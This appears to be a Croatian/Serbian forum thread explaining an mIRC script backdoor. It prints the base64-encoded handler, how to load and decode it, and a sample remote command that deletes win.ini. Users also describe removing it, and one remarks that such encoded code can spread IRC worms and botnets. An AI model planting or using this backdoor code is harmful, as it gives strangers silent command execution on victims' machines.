(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) - to ti je codirani cod, kojeg dekodiras sa $decode
.load -rs czm.mrc - to je da louda taj backdoor.
msg kill nick - ako to neznash kaj je onda se udari po glavi.
------------
E sad kad kucas : //echo -a $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) - onda decodiras ovaj code i vidis: on ^*:text:ins*:?:{ . $+ $2- | haltdef } a to znaci da kad bilo ko napise "ins KOMANDA" ti ces ju napraviti. etc "ins quit ja sam jebeni lamer"!
Ljudi pa vi niste skuzili, on moze imati tone firewallova jedino rjesenje je da obrise taj backdoor ili da ignorira sve poruke i noticeve i ctcpove. Jer taj backdoor funkcinonira tipa:
DOBIS MSG na kojem PISE (kojeg ti ne vidis):" ins /remove c:/windows/win.ini " ti ces u mircu to kucat i obrisat ces si win.ini. I firewall ne reagira jer se to desava local
E ovako kad se konektujem na iRC odma mi ispise poruku da nema nicka kojem ja upste nisam pisao.
Bilo kome kada napisem izbaci poruku da taj nick koji je upado u moj PC nije online znaci da je tip podesio skriptu da mu javi kada sam ja na ircu.To po meni je jedna vrsta trojanca.
Imo sam firewall ali nista pa sam skonto da je to sve bilo u skripti.
Reinstaliro sam irc skriptu i sada nema vise tih poruka u vezi nicka koji je ulazio u PC.
yednostavno nadji tay fayl u mIRCu i obrishi ga (ono oznacish ga desni klick na mishu i delete..)
ybg od kad sam ya znao za tay "fazon" al samo ne znam kako se prikriva sa $decode :((( mora nekoda mi poyasni
Lol, kad sam video od koga si to primio sve mi je jasno :)) Inace ima dosta tih irc worm-ova po ircu, i sa encode-om se moze napraviti mnogo mocan kod i naterati se neki lamer da ga otkuca i on dalje nastavlja da ga siri :)) Napravis botnet lol :D mada pametni deztr0jah :P lol